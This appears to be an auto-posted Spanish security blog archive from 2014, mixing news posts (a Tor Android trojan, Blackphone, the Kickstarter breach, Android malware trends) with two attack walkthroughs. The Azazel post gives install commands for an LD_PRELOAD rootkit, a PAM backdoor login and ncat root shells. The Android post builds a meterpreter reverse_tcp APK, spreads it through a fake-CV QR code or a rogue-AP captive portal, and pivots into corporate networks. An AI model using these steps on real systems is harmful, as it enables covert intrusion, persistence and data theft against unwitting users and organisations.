miércoles, 26 de febrero de 2014

Encontrado por primera vez un malware para Android basado en Tor

Los smartphones ya están presentes cuando usamos la banca online, el comercio electrónico o la computación en la nube. Sin embargo, con el crecimiento del uso de los smartphones, también es más fácil atacar a los propietarios de los negocios online y ésto se está traduciendo en un pico en el crecimiento de malware. Actualmente, Kaspersky Lab ha encontrado un nuevo troyano para Android basado en Tor.

Acerca de la red Tor:

Tor es una red de varias capas para mantener la privacidad que trabaja con sus propios dominios .onion. Protege la ubicación del servidor y la identidad del propietario. Debido a su sistema y a su arquitectura de capas, Tor parece más lento en rendimiento pero permite facilita alojar servidores maliciosos dentro de ella. Diversas acciones de botnets masivas podrían manipular toda la red.

El malware encontrado se llama "Backdoor.AndroidOS.Torec.a" y se basa en Orbot, una plataforma de código abierto del cliente Tor para dispositivos móviles Android. Este programa malicioso/troyano funciona con dominios Tor .onion. No está claro el número de dispositivos infectados por este malware hasta ahora.

El troyano utiliza la funcionalidad del cliente Orbot, pero no lo copia. Es decir, el atacante simplemente añade código en su aplicación.

Se cree que el malware controla el servidor y se comunica con su servidor C&C (servidor de comando y control) mediante el protocolo oculto Tor (Tor hidden protocol). Este malware basado en Tor es capaz de robar SMS, números de teléfono, los detalles del país, IMEI, la versión del sistema operativo, puede hacer una petición USSD y puede enviar SMS a un número específico. Sin embargo Kaspersky no ha mencionado si este malware puede interferir en la información bancaria o no.

Para evitar la infección de este malware en tu Android vale la pena considerar algunos puntos:

• Instalar aplicaciones desde Google Play y evitar los recursos de terceros.
• Asegurarse de tener la opción sin marcar "fuente desconocida" en los ajustes.
• Leer los comentarios antes de descargar cualquier aplicación.
• Prestar mucha atención a los permisos durante la instalación de la aplicación.
• Instalar la protección de antivirus y firewall.
• Mantener al día las aplicaciones cada vez que esté disponible una actualización.

Hemos visto un crecimiento dramático en el malware para Android en los últimos dos años. Esto es debido a que la gente ha empezado a pasar del uso de los escritorios pesados al uso de Smartphones. Los hackers crackers están adoptando técnicas de hacking sofisticadas para manipular los dispositivos y robar información para utilizarla de forma ilegal. Según la encuesta el 99% de los dispositivos están en riesgo. Debido a que es de código abierto y las posibilidades de personalización, Android se ha convertido en popular entre los desarrolladores, y para los hackers.
 
English version:
 
Smartphone is now involved everywhere whether you surf for online banking, E-commerce or cloud computing. However, with the growth of Smartphone, it become easy for hackers to target online business owners and it’s resulting into peak malware growth nowadays. Currently, a new TOR based android Trojan malware is found by Kaspersky Lab.

About Tor Network:

Tor is an overlay network for secrecy, which works on its own domains named .onion that can be available via Tor. It protects the server location and identity of the owner. Due to overlay and its system, Tor seems slower in performance and hackers can host their servers within it. Massive Botnet actions can manipulate the whole network.

This malware is called “Backdoor.AndroidOS.Torec.a'”, which relies on Orbot, an open source Tor client platform for android mobile devices. This Trojan malware works on “.onion” - Tor domain. It is not clear about the number of devices infected with this malware till now.


The Trojan uses the functionality of the client, but do not copy Tor-client Orbot. The attacker simple adds code into your application.

It is believed that the malware control the server and steal communication with C&C server (command and control server) using TOR hidden protocol. This TOR based malware is capable of stealing SMS, phone numbers, country detail, IMEI, OS version and can make USSD request, and can send SMS to a specified number. However Kaspersky did not mention whether this malware can harm banking information or not.

To avoid malware infection in your android below is some worth considering points.

•    Install app from Google Play and avoid third party resource.
•    Ensure that you have unchecked option “unknown source” in Smartphone App setting.
•    Go through reviews before downloading any app.
•    Pay close attention to permission while installing app.
•    Install antivirus and firewall protection.
•    Update your application whenever update is available.

We have seen a dramatic growth in android malware in past two years. As people started to move from heavy desktop usage to Smartphone usage, hackers are adopting sophisticated hacking techniques to manipulate the devices and steal information to use in unlawful way. According to survey 99%, devices are at risk. Due to open source and full privilege of customization, android becomes popular among developers as well hackers.

About Author 
 
Abel Wike is a head of fraud prevention team at ClickSSL.com. She enjoys the challenges of creativity and attention to detail. Advance Technology has always a source of wonder for her, sparking her research, to extend her sympathetic and knowledge of this earliest progress. In so doing she has focused with a deeper insight into various technologies. Follow her on Facebook, Twitter & LinkedIn

View the original article here


This post was made using the Auto Blogging Software from WebMagnates.org This line will not appear when posts are made after activating the software to full version.

lunes, 24 de febrero de 2014

Azazel: el nuevo rootkit de entorno de usuario basado en preload

Para mejorar el rendimiento de los sistemas, las librerías compartidas permiten que varios programas accedan a la misma dirección de una función en lugar de cargar varias instancias de una misma en memoria. Estas librerías además pueden vincularse dinámicamente en tiempo de ejecución en lugar de forma estática durante la compilación.

Por defecto, un programa en Linux buscará las librerías compartidas necesarias en:
- la ruta indicada en la variable de entorno LD_LIBRARY_PATH
- las rutas contenidas en el fichero de caché /etc/ld.so.cache
- las rutas por defecto para las librerías: /lib y luego /usr/lib

Sin embargo, existe otra variable LD_PRELOAD en la que podemos especificar las librerías compartidas que se deben cargar antes que todas las demás. Esta característica se usa normalmente para depuración, aunque muchos programas como tsocks y checkinstall también la utilizan. De hecho en muchos sistemas existe el fichero /etc/ld.so.preload que contiene las rutas de acceso a las bibliotecas compartidas para precargar globalmente.
Como resultado todo el espacio de usuario, salvo aplicaciones compiladas estáticamente (lo cual es poco frecuente), utilizará funciones precargadas que se "superponen" a las estándar.

Como podéis imaginar, esta técnica también puede utilizarse para el mal...
"Toda la tierra ha sido corrompida por medio de las obras que fueron enseñadas por Azazel: a él se le atribuye todo pecado."  - 1 Enoc 2:8

Con LD_PRELOAD se pueden precargar funciones como strcpy(), etc. y volcar la salida a ficheros para obtener la información más adelante, u otras cosas más divertidas como hookear ssh, gpg, o cualquier aplicación en la que el usuario introduzca datos sensibles, sólo hay que encontrar las llamadas adecuadas.

Hace ya algunos años surgió un rootkit llamado Jynx que utilizaba LD_PRELOAD para hookear programas en tiempo de ejecución. Podemos decir que su sucesor es Azazel, un nuevo rootkit para Linux en modo usuario, escrito en C y que utiliza esta misma técnica. Eso sí, Azazel es más robusto y tiene características adicionales, y se centra en gran medida en métodos anti-debugging y anti-detección.

Sus principales características son:

- Anti-debugging
- Evita la detección por medio de unhide, lsof, ps y ldd
- Oculta archivos y directorios
- Oculta conexiones remotas
- Oculta procesos
- Oculta inicios de sesión
- Hooks PCAP que evitan sniffing local
- Dos backdoors "accept" con shells completos PTY
. Crypthook encrypted accept() backdoor
. Plaintext accept() backdoor
- Backdoor PAM para escalado de privilegios local y entrada remota
- Limpia logs de entradas utmp/wtmp
- Usa xor para ofuscar cadenas estáticas

Para la instalación y configuración inicial empezaremos descargando Azazel desde su repositorio oficial en Github:

$ git clone https://github.com/chokepoint/azazel.gitCloning into 'azazel'...remote: Counting objects: 44, done.remote: Compressing objects: 100% (37/37), done.remote: Total 44 (delta 14), reused 37 (delta 7)Unpacking objects: 100% (44/44), done.
Antes del despliegue, podemos cambiar las variables contenidas en el fichero config.py. Los datos serán cifrados usando una clave XOR para no exponerlos en volcados de programas como "strings".$ cd azazel$ lsazazel.c  config.py    crypthook.h  pam.c   README.mdazazel.h  const.h      LICENSE        pcap.c  xor.cclient.c  crypthook.c  Makefile     pcap.h  xor.h$ vi config.py#!/usr/bin/env pythondef xor(x_str):        return ''.join(list('\\x'+hex(ord(x) ^ 0xfe)[2:] for x in x_str))# Change everything in this box#-----------------------------------------------------------------------LOW_PORT = "61040"                    # Lowest source port for plain text backdoorHIGH_PORT = "61050"                   # Highest source port for plain text backdoorCRYPT_LOW = "61051"                   # Lowest source port for crypthook backdoorCRYPT_HIGH = "61060"                  # Highest source port for crypthook backdoorPAM_PORT = "61061"                                        # Also hide this port, but don't trigger accept backdoorsMAGIC_STRING = "__"                   # Hide files with this string in the nameBLIND_LOGIN = "rootme"                # Username for ssh / su PAM backdoor.C_ROOT = "root"                       # Give accept() users these privsSHELL_MSG = "Welcome!\nHere's a shell: " # Welcome msg for remote userSHELL_PASSWD = "changeme"             # Remote password for accept backdoorsSHELL_TYPE = "/bin/bash"              # Execute this as the shellANTI_DEBUG_MSG = "Don't scratch the walls"CLEANUP_LOGS = "CLEANUP_LOGS"                                                                     1,1 # Crypthook key constantsPASSPHRASE = "Hello NSA"              # This is the crypto key. CHANGE THIS.KEY_SALT = "changeme"                 # Used in key derivation. CHANGE THIS.#-----------------------------------------------------------------------...
 A continuación compilamos las fuentes (es posible que previamente tengamos que instalar dependencias como libpcap0.8-dev o libpam0g-dev)$ makecc -fPIC -g -c azazel.c pam.c xor.c crypthook.c pcap.ccc -fPIC -shared -Wl,-soname,libselinux.so azazel.o xor.o pam.o crypthook.o pcap.o -lc -ldl -lpam -lutil -o libselinux.sostrip libselinux.so 
Por defecto Azazel se instala así mismo en /lib/libselinux.so y añade una línea en /etc/ld.so.preload. Esto significa que hay que tener los permisos necesarios así que, para instalar el backdoor, será necesario haber escalado privilegios antes:root@kali:/tmp/azazel# make install[-] Initiating Installation Directory /lib[-] Installing azazel[-] Injecting azazelroot@kali:/tmp/azazel# cat /etc/ld.so.preload/lib/libselinux.so
Ahora que hemos comprometido el sistema, vamos a ver cómo hacemos para implantar nuestro backdoor. Está claro que el principal objetivo es OpenSSH, y no sólo porque se trata de unos de los demonios más desplegados en todos los sistemas, si se logra comprometerlo facilita al atacante acceso completo y seguro(cifrado) y completo a la máquina de la víctima.

Lo más fácil sería sustituir el binario original por nuestra versión maliciosa de ssh, si bien facilitaríamos mucho las cosas al administrador del sistema si utiliza detección por firmas (como ossec u otro HIDS), o mantiene una lista actualizada de los ejecutables de hash en su sistema.

La solución por tanto pasa por comprometer sólo uno de sus componentes.

OpenSSH compila todas las funciones criptográficas necesarias directamente en el binario estándar, y lo hace precisamente para impedir la posibilidad de hookear llamadas a la API de la biblioteca OpenSSL.

Nuestro objetivo se dirige a los módulos PAM (Pluggable Authentication Modules). No obstante PAM también se protege en este aspecto y las variables del core de autenticación se almacenan en privado y sólo se puede acceder a través de las API adecuadas a fin de evitar que posibles atacantes hooken la librería y el acceso a la totalidad de la base de datos. Sin embargo aún tenemos un resquicio del que podemos aprovecharnos...

Cada una de las funciones del esquema de autenticación devuelve un PAM_SUCCESS si la información es correcta. Como comentamos no podemos acceder a los datos de las contraseñas pero, ¿y si hookeamos las funciones para devolver siempre un PAM_SUCESS? De esta manera cualquier contraseña facilitada para un usuario concreto definido en el backdoor será automáticamente aceptada y obtendremos acceso como root... ingenioso ¿verdad? ;)

Para ocultar además la conexión, Azazel incluye la librería compartida client:

$ make clientcc -fPIC client.c -shared -o client.so$ LD_PRELOAD=./client.so ssh rootme@localhostroot@host:/ #
Incluso podemos usar el hook de PAM para escalar localmente privilegios:$ su - rootme#
Con el demonio sshd hookeado podemos también utilizar otros dos backdoors para conectarnos remotamente al sistema comprometido. Uno cuyo tráfico irá en texto plano, si bien localmente se ocultará la conexión (sniffing) y su detección:$ ncat target 22 -p 61040changemeWelcome!Here's a shell.root@host:/root #
Y otro cifrado en Crypthook, un wrapper de cifrado AES para conexiones TCP/UDP:$ git clone https://github.com/chokepoint/CryptHook.git$ LD_PRELOAD=./crypthook.so ncat localhost 22 -p 61051changemeWelcome!Here's a shell.root@host:/root/ #
Azazel añade la posibilidad de limpiar logs mediante la variable de entorno CLEANUP_LOGS, oculta procesos (HIDE_THIS_SHELL) y posee algunas medidas antidebugging que irán mejorando en próximas versiones:$ strace -p $PPIDDon't scratch the walls
Por último, comentar que por supuesto Azazel no es totalmente indetectable. De hecho un método de detección simple pero efectivo es comparar la dirección de las syscalls cargadas directamente desde libc con la dirección "siguiente" a esa llamada del sistema. Mediante la comparación de los dos valores, se puede detectar con mayor precisión los rootkits de entorno de usuario basados en preload.

Fuentes:

- http://blackhatlibrary.net/Azazel
- http://www.blackhatlibrary.net/Jynx/2.0/PAM
- http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html

View the original article here


This post was made using the Auto Blogging Software from WebMagnates.org This line will not appear when posts are made after activating the software to full version.

Comprometiendo sistemas Android (1ª parte)

Cada día más personas utilizan smartphones y tablets para navegar por Internet y gestionar sus cuentas online. Por este motivo, los cibercriminales centran los ataques hacia estos dispositivos, lo que supone la aparición de nuevas amenazas y malware.

Durante este año, el 98,09% de los ataques móviles fueron dirigidos al sistema operativo Android. Esto se debe a varios factores. En primer lugar, esta plataforma es muy popular ya que es el sistema operativo más utilizado en los smartphones, con una cuota de mercado del 70%. Además, la naturaleza de plataforma abierta del sistema operativo Android, la facilidad con la que se pueden crear las aplicaciones o la amplia variedad de mercados de aplicaciones (no oficiales) que existen influyen de manera significativa en la seguridad. Android le está ganando la partida al resto de sistemas operativos y ya es el software para móviles más utilizado en todo el mundo.

Por tanto, es un factor muy importante a tener en cuenta a la hora de securizar una red corporativa, o a la hora de planificar un ataque dirigido.

Los terminales inteligentes, pueden llegar a ser una puerta fácil, que nos abran las puertas a un objetivo bien securizado. En muchas redes y por descuido del usuario, suelen ser aparatos confiables... Ejemplo claro sería el móvil del jefe, conectado por wifi a la red , que da al traste con todas las políticas de IT, creerme que es más usual de lo que debiera. 

En esta serie de entradas vamos a ver como poder echar mano a este recurso....

Para el ejemplo, nos vamos a valer de un módulo de Metasploit, Android meterpreter, que cabe destacar que es una herramienta brillante desde su "simpleza", la cual sería muy fácil incluir en algún código a modo de 'backdoor' sin levantar muchas sospechas. A parte los creadores han dejado el código fuente y mucha información a nuestra disposición.
También podríamos utilizar cualquier otro tipo de backdoor para android, o incluso aprovechar herramientas que pueden estar albergadas en el sistema, como veremos en entradas posteriores...

Para el que necesite más detalles sobre este módulo, me viene a la cabeza un buen artículo de SbD.

Para la infección veremos un par de ejemplos sencillos, aunque este apartado sólo esta limitado por la imaginación del artista...
Como dije anteriormente para ilustrar esta entrada nos va a bastar con android meterpreter, con el que vamos a generar una aplicación para infectar nuestro objetivo. No nos vamos a entretener mucho en detalles pero para el que conozca meterpreter y msfpayload no le será difícil enrevesar el proceso a fin de complicar su detección...Tanto la elaboración como el ataque en sí difiere poco del meterpreter clásico:Abriremos nuestro terminal y a typear:#sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1..121 LPORT=4444 R > /root/Desktop/wifi.apk


Con esto generamos la aplicación, la cual nos está esperando en /root/Desktop/ 

recordar que la ip tiene que ser la de eth0 (o por donde nos entre internet).

Vamos a ver dos métodos sencillos el primero todo un clásico "QR" y en el segundo utilizaremos un falso AP (que ya vimos en Hackplayers y con el fin de darle a este "cotarro" cierta continuidad interesante).
Para la primera nos basta con subir nuestra aplicación a cualquier servidor y generar un código QR de enlace a esta, lo podemos hacer directamente con SET o con cualquier herramienta online para este fin.
(luego veremos lo que puede hacer saltar nuestras alarmas)..

Arrancamos SET y seguimos estos pasos:

1) Social-Engineering Attacks

Seleccionamos la opción
 
9) QRCode Generator Attack Vector

Ingresaremos la url donde hemos subido nuestra apk.

El siguiente paso requiere de algo de ingeniería social para hacer llegar el código al objetivo:


Por ejemplo podemos mandar un currículum falso a recursos humanos de la empresa con el QR  (que esta de moda) dando el enlace de la descarga... otra cosa sera que la víctima ejecute el archivo....cosa más que improbable.2º método

Nuestro hotspot trampa

 10 min. Gimp, html basico...se puede mejorar. Mi gato que es de la Sgae reserva los derechos.
Aquí refinaremos nuestro engaño...Partiendo de la entrada anterior en la que creamos un punto de acceso falso, en esta ocasión añadiremos unas pequeñas modificaciones a nuestro AP para hacerlo pasar por un hotspot o portal cautivo lícito que ofrece servicio a Internet, y deberemos convencer al usuario a descargarse una aplicación y ejecutarla, para obtener un user y password válido. Si os acordáis, en el la entrada anterior hicimos un script para arrancar y darle las directrices a iptables al unisono se llamaba "RogueAP.sh"; en esta ocasión haremos otro que no es más que el mismo modificado con una  regla más de iptables para crear el portal cautivo.
  Si os dais cuenta tan solo le he añadido una linea.
iptables -t nat -A PREROUTING -s 10.0.0.0/24 -p tcp --dport 80 -j REDIRECT --to-ports 55555

Para el siguiente paso necesitamos tener instalado apache web server, y simular un hotspot ... para esto necesitaremos un index.html y un par de archivos php y ser algo creativos. Yo no me he esplayado mucho, pero cuanto más meticulosos seamos, mayor será la probabilidad de éxito, también podríamos clonar el hotspot de una cafetería, hotel etc...
No voy a entrar en el detalle de cada uno de los archivos, tan solo los describiré los más importantes y os dejo la descarga.

INDEX.html : nuestra página
log.php : se encarga de comprobar el login y de dejar pasar una vez hecho.
inf.php : filtra por user agent, si es android sirve una apk, si es un PC podría servir otro archivo ...tan solo está para android puesto es de lo que va la entrada...(el que quiera lo puede acabar y así tener un buen "atrapamoscas"). 

ficheros hotspot

Una vez descargada la carpeta , la copiamos a  /var/www/hotspot (previamente creado) y le damos permisos...


Ahora tan solo nos queda configurar apache.
Dado que llevo más de un asunto entre manos en mi servidor apache, para hacerlo que responda por el puerto 55555 que hemos configurado en Falsohotspot.sh anteriormente, y para hacer las cosas medio regular, he optado por configurarlo para que me sirva el hotspot como otro dominio en la máquina para ello seguiremos estos pasos...

#cp /etc/apache2/sites-available/default hotspot
#nano hotspot

Editaremos las 3 primeras lineas
 

Ahora activamos el site:

#a2ensite hotspot

En /etc/apache2/ports.conf decimos por donde va a estar escuchando nuestro hotspot.

#/etc/init.d/apache2 restart

Con ésto hemos terminado de configurar apache.

Por último ejecutaremos visudo y añadiremos esta linea al final del archivo
www-data bt=(root) NOPASSWD:/sbin/iptablesHemos dicho que vamos a utilizar el POC de meterpreter para android.....(podríamos utilizar cualquier otra apk pero a sido lo primero que he agarrado).

Así no creo que engañe a nadie desde luego...... tendremos que hacer algunos cambios, no muy difíciles para tener alguna oportunidad....aquí solo lo voy a tocar muy superfluamente, pero se puede profundizar muchísimo más...sólo limitados por nuestros conocimientos.. 
 
Para realizar estos necesarios cambios, si queremos dar el pego (y es aquí donde he visto que yo solo me liado, podría haber cogido un soft mas adecuado) utilizaremos un tipo de  aplicación  a la que mi compañero Vicente es asiduo ;D Apk_manager.. lo tenemos de todos los sabores Linux, Windows, y mac 

Una vez instalada Apk_manager, vamos a llevar a cabo las siguientes acciones:

-descomprimiremos la aplicación.
-cambiaremos los archivos pertinentes.
-comprimiremos y firmaremos

Descomprimir la aplicacion: cogeremos el archivo creado con msfpayload lo situaremos en la carpeta place-apk-here-for-modding , arrancaremos la aplicacion con ./Scrit.sh , Nos preguntará si queremos limpiar la carpeta out, le diremos que NO.
Pulsaremos la opción 9.

Cambiar archivos: nos dirigimos a la carpeta Out y cambiamos los archivos que nos convengan.

Comprimir y firmar: pulsamos la opción 13 y tras esperar un rato ...Ctrl+C.. nos generará un archivo llamado repackaged-signed.apk en la carpeta place-apk-here for-mading. Copiaremos nuestra aplicacion modificada al directorio que previamente crearemos /var/www/hotspot/downloads.

Ya tenemos listo nuestro "atrapamoscas" para este ejemplo...Podemos echarle un par de horas para completarlo...  proporcionarle habilidades sniffers, completar su detección de User Agent y enviar otra serie de archivos, o incluso exploit remotos al objetivo....y tendremos un cebo MUY LETAL..no sólo para Android.... 
Puff ya llegamos al final tranquilos....Bueno a llegado el momento de comprobar si todo esta bien y arrancar nuestro invento...con una conexión a Internet por ETH0 (o en otra interface ya sea cableada o wireless) arrancaremos nuestro Hotspot con el script creado (no olvidar arrancar apache si no lo hemos hecho, y que eth0 tenga ip lo cual podemos forzar si es necesario con dhclient eth0), este a su vez arrancara nuestro servicio DHCP.sudo msfconsole
use exploiter/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.121

set lport 4444
exploit
Tan sólo nos queda esperar a nuestros nuevo/s amigos....


Al cabo de un rato....vemos que nuestro objetivo picó...
Para ver que podemos hacer con meterpreter basta con hacer un help y nos dará un listado de sus posibilidades...

meterpreter>help

Entre algunas lindezas meterpreter nos permite hacer capturas con la cámara y el micro, tener un acceso a la shell del sistema con lo que esto supone, subir y descargar archivos.etc etc.

Debemos considerar la posibilidad de un acceso permanente al dispositivo, (que ya veremos), aparte de esto hay una opción muy interesante al igual que peligrosa, es la posibilidad de hacer port-relaying desde el terminal móvil... Sería un desastre que el usuario tuviese levantado la VPN que le da acceso a la red interna de la empresa....

meterpreter> portfwd add -l 80 -r 192.168.123.15 -p 80

MORALEJA : utiliza siempre el sentido común. Usuario de teléfono móvil precavido vale por dos. Cuidado con los archivos que llegan por mensajería instantánea, correo electrónico o de cualquier otra manera....tener un buen hábito para la seguridad informática vale por dos antivirus, y por último un firewall para tu teléfono te puede ahorrar mas de un dolor de cabeza...

View the original article here


This post was made using the Auto Blogging Software from WebMagnates.org This line will not appear when posts are made after activating the software to full version.

Presentan Blackphone, posiblemente el smartphone más seguro del mundo

Por fin, hoy se ha presentado Blackphone en el Mobile World Congress de Barcelona que a partir de ahora podrá también reservarse.

Para quien no lo conozca todavía, "se trata de un 'smartphone' libre e independiente que proporciona tanto a individuos como a organizaciones la posibilidad de realizar y recibir llamadas seguras, intercambiar mensajes de texto seguros, transferir y almacenar ficheros, y videoconferencia sin comprometer la privacidad del usuario al usar el terminal".

Fue desarrollado por GeeksPhone, una empresa española de desarrollo de terminales abiertos, en colaboración con Silent Circle, la empresa americana de Phil Zimmermann (creador de PGP) especializada en la privacidad en las comunicaciones.

El Blackphone funciona con una modificación especial de Android llamada PrivateOS y cuenta con varias herramientas de privacidad preinstaladas, todas las cuales están plenamente habilitadas para, al menos, dos años de uso. Estas herramientas incluyen el conjunto de aplicaciones de Silent Circle, tales como 'Silent Phone', 'Silent Text' y 'Silent Contacts', búsquedas anónimas, navegación privada, VPN (Red virtual privada) de Disconnect.me y almacenamiento seguro de archivos en la nube de SpiderOak. Además, Blackphone dispone del 'Smart WiFi Manager' creado por Mike Kershaw, arquitecto jefe de SGP Technologies, así como de un potente control remoto de borrado y una herramienta de recuperación del dispositivo.

Por otro lado sus características de hardware son:
- un procesador de cuatro núcleos a 2GHz
- 2GB RAM
- 16GB de alamacenamiento
- LTE/HSPA+
- cámara frontal >8Mpx más trasera

Su precio parte de $629 (459€), impuestos y gastos de envío a parte, y empezará a entregarse a partir de junio de este año.

¿Será tan seguro como pretende serlo? Pronto lo veremos...

Web: https://www.blackphone.ch

Fuentes:
- Blackphone, un teléfono inteligente en el que prima la privacidad
- Blackphone, un 'smartphone' español a prueba de vigilancia
- Blackphone, el android que protege al máximo la privacidad, disponible para reservar el 24 de Febrero en el MWC
- Blackphone, el «smartphone» que piensa de verdad en la privacidad
- Presentación del Blackphone en el Mobile World Congress 2014


View the original article here


This post was made using the Auto Blogging Software from WebMagnates.org This line will not appear when posts are made after activating the software to full version.

miércoles, 19 de febrero de 2014

Kickstarter hackeado, hechos y conclusiones

Kickstarter (www.kickstarter.com) una de las webs de crowdfunding online está ahora en la lista de sitios web hackeados y se considera que ha sufrido una brecha de seguridad de criticidad alta. Los hackers obtuvieron acceso ilegal al sitio web y robaron información de los usuarios, incluyendo nombres de usuario, contraseñas cifradas, direcciones de correo electrónico y números de teléfono. Sin embargo, entre la información robada parece que no hay ningún dato de tarjetas de crédito.
La compañía reveló en una nota que los hackers tuvieron éxito en la obtención de acceso a dos cuentas. La compañía recomendó a los usuarios que cambiaran su contraseña de inmediato. Incluso la empresa dijo que si los usuarios estaban utilizando la misma contraseña para otros sitios web, debían cambiarla de inmediato para mantener la seguridad.

Las contraseñas robadas se cifran utilizando SHA-1, y la compañía avisó a los usuarios del cambio de contraseña con el propósito de login. Sin embargo, la compañía no almacena el número de tarjeta de crédito completo, aunque sí almacena la fecha de caducidad y los últimos cuatro dígitos de su tarjeta de crédito.

Después de la revelación de tal actividad, la compañía parece que ha dejado atrás el ataque, pero informaba a los clientes que el sábado 15 de febrero 2014: "Sentimos mucho que esto haya sucedido. Tenemos el listón muy alto en la forma en la que servimos a nuestra comunidad, y este incidente es frustrante y molesto." la empresa justifica en un blog. La compañía ha respondido a más de 5.000 consultas sobre esta noticia.

Kickstarter aprendió de este ataque, y ha puesto su atención en la mejora de sus procesos de seguridad y de sus sistemas de seguridad de muchas maneras. La compañía también está haciendo todo lo que está su alcance para evitar este tipo de ataques en el futuro próximo.

Los increíbles cinco hechos acerca de este informe:

• Kickstarter no sabía que habían sido hackeados, hasta que la autoridad policial les informó.
• No hay información robada de tarjetas de crédito excepto nombres de usuario, contraseñas, direcciones de correo electrónico, etc.
• La compañía no ha revelado la cantidad de datos robada.
• Las contraseñas se protegen criptográficamente (hash) lo que hace a los hackers difícil romperlas.
• La reutilización de una contraseña en múltiples sitios es peligrosa y así lo comunicó la compañía.
• Por último, la compañía reveló todos los detalles después de cuatro días del ataque.

En conclusión:

La cibercrimen es una preocupación creciente en el mundo de Internet, y nos estamos dando cuenta que el año pasado se robaron millones de datos y que todavía estas brechas e incursiones siguen vigentes en el actual 2014. De los puntos anteriores, sólo podemos mantener la esperanza de que la empresa encuentre el verdadero culpable detrás de este ataque, y que pueda recuperar la confianza y la fe de sus clientes.

English version:
 
Kickstarter (www.kickstarter.com) one of the online crowdfunding website is now in the list of the hacked websites, which is to be stated a high-profile website breach. Hackers gained illegal access of the website and stole user’s information, including usernames, encrypted passwords, email address, and phone numbers. However, during this data breach there is no harm caused to the credit card data.

The company revealed in a note that the hackers were successful in gaining access of two accounts. The company said to users to change their password right away for the website. Even the company said to users that if users were utilizing the same password for other websites, then users should change immediately for better security. 

The stolen passwords were encrypted using SHA-1, and the company said to users to apply new password for login purpose. However, the company does not store the full credit card number, but only stores expiry date and the last four digits of credit card.

After revelation of such hacking activity, the company has overcome from the breach but informs customers on Saturday, 15 Feb. 2014. "We’re incredibly sorry that this happened. We set a very high bar for how we serve our community, and this incident is frustrating and upsetting." the company justifies in a blog post. The company has responded to more than 5000 inquiries about this news.

Kickstarter learned from this attack, and improved their security processes and security systems in many ways. The company is also doing everything within their power to avert such attacks in the near future.

The amazing five facts about this report:

•    Kickstarter did not know that they had been hacked, but the law enforcement authority informed them.
•    No credit card data was breached except username, passwords, email address, etc.
•    The company has not disclosed the amount of breached data.
•    The passwords were not encrypted but cryptographically hashed, which made it difficult for hackers to break them.
•    Reusing a password in multiple sites is dangerous so stop using them as per company statement.
•    Finally, the company revealed all the details after four days of the attack.

In the conclusion:

Cyber crime is a growing concern for internet world, and we have noticed millions of data breach happened in the past year and is still prevailing in the current 2014 year. From the above points, we can only keep hope that the company will find the real culprit behind this attack, and can restore faith in customer’s community.

About Author 
 
Abel Wike is a head of fraud prevention team at ClickSSL.com She enjoys the challenges of creativity and attention to detail. Advance Technology has always a source of wonder for her, sparking her research, to extend her sympathetic and knowledge of this earliest progress. In so doing she has focused with a deeper insight into various technologies. Follow her on Facebook, Twitter & LinkedIn

View the original article here


This post was made using the Auto Blogging Software from WebMagnates.org This line will not appear when posts are made after activating the software to full version.

El malware en Android está mutando y desafiándonos

Android es ya una de las plataformas para smartphones más populares. Pero también tiene asociadas vulnerabilidades. Un conocido informe de Juniper en 2013 mostró que Android es el principal sistema operativo infectado con un 92% de sus aplicaciones vulnerables. Los expertos en seguridad están mostrando su preocupación por las amenazas emergentes contra Android y los smartphones. Debido al aumento del uso de los smartphones, muchos usuarios han cambiado sus hábitos de navegación sustituyendo el escritorio por smartphones para sus tareas diarias. Ya sea comprando en línea, usando la banca o visitando los medios de comunicación social, su primera preferencia son los smartphone en lugar de la computadora portátil o de escritorio.

Si hablamos de informes de seguridad sobre smartphones en 2014, a continuación, el informe de seguridad de Cisco establece que vale la pena considerar el malware móvil en los próximos meses. Sin embargo, en 2013, la cuota de malware móvil fue de sólo del 1,2%, aunque en el futuro, los hackers apuntarán mucho más a los dispositivos móviles debido al cambio de tendencia de los usuarios y a la facilidad de acceso. Cisco dijo que algunos de los malwares móviles fueron diseñados para rastrear dispositivos smartphone, pero hay otros malwares diseñados para phishing likejacking y otros de ingeniería social.

Los usuarios de Android suponen el 71% de los destinatarios de malware, mientras que los usuarios del iPhone de Apple son un 14% frente al 14% del resto.

El informe de Cisco también mostró que hay un malware para Android llamado "Andr/Qdplugin-A" que el más encontrado en 2013 (43%).

En otro importante informe de seguridad de Sophos en 2014 figuran algunos de los malwares para Android más extendidos durante el año 2013, que son los siguientes.
    
A parte de los malware en Android listados anteriormente, todavía hay tres grandes malwares que se propagaron durante el 2013, y son los siguientes.

- La botnet llamada "Andr/GGSmart-A": Esta botnet funciona en PC y móvil de la misma forma que se usa un servidor de comando y control de un dispositivo móvil. Se puede enviar un SMS premium a cargo del dueño del dispositivo. Esta botnet puede cambiar el texto del SMS, controlar el número del SMS premium.

- Ransomware: En junio de 2013, el primer ransomware descubierto para Android fue llamado Defender Android. Este ransomware utiliza diferentes tácticas de ingeniería social y hace el dispositivo y sus archivos inaccesibles y exige el pago para liberarlos. Generalmente, el ransomware obtiene privilegios de administrador de acceso. Puede restringir las llamadas salientes, cambiar la configuración, cerrar las tareas y desinstalar las aplicaciones. Incluso el ransomware puede quitar el botón de volver e inicio del navegador.

- Andr/Spy-ABN: Es un nuevo tipo de malware, que tiene como objetivos las webs bancarias mediante una combinación de ataque man-in-browser y tácticas de ingeniería social para robar datos de los usuarios de smartphone.

Algunas medidas de seguridad desde la perspectiva del usuario y de la organización:

• Nunca responda a un enlace de anuncio desconocido ya que puede contener malware que puede instalar software malicioso o puede llevarle a otros sitios web.
• Rechace siempre aplicaciones que requieren permiso de acceso a los contactos y demás cosas personales durante la instalación.
• Use preferiblemente Google Play para descargar aplicaciones y evite terceras fuentes de descarga, ya que podrían contener aplicaciones maliciosas.
• Tenga siempre en cuenta opiniones de los usuarios antes de descargar ninguna aplicación.
• Use un programa antivirus conocido en su teléfono inteligente que analice periódicamente todo su smartphone.
• Mantenga el dispositivo actualizado. Siempre se deben considerar las actualizaciones de los fabricantes de dispositivos.
• Utilice su equipo sólo en una conexión inalámbrica segura, evite wifi gratuito.
• Las organizaciones deben elegir prevención de incidentes de malware de acuerdo con el entorno como administrado y no administrado.
• El personal de TI de las organizaciones deberán proporcionar conocimientos a sus usuarios y empleados para crear conciencia entre ellos sobre la vulnerabilidad y la mitigación de riesgos.
